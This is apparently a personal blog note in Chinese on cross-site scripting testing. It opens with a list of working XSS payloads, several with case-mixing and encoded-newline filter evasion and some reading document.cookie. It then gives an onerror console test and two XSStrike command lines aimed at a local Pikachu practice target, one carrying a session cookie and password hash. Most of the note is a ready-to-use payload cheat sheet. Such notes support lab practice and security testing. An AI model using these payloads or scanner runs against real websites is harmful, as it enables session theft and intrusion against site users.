控制台打出XSS

Xss有效载荷:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

}]};(confirm)()//\

<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z

</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z

</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

直接提交xss 无效

个人笔记:

1.输入xss语句

1
<img src="invalid.jpg" onerror="console.log(1)">

这条语句的作用的在控制台打出1

XSS 工具

xsstrike

https://github.com/s0md3v/XSStrike

靶机pikachuxss注入与代码分析(XSStrike实战)

案例一:

命令:

1
python xsstrike.py -u "[http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit](http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit)" --skip --skip-dom

试一下第一个payload,利用的是html的details标签

案例二:

1
python xsstrike.py -u "[http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php](http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php)" --data "message=1&submit=submit" --headers "Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=slttj3hh1eig65tvj7ldppb984"

此命令有POST数据和Cookie

漏洞挖掘
#XSS
控制台打出XSS
https://jimi-lab.github.io/2024/07/01/控制台打出XSS/
作者
Jimi
发布于
2024年7月1日
许可协议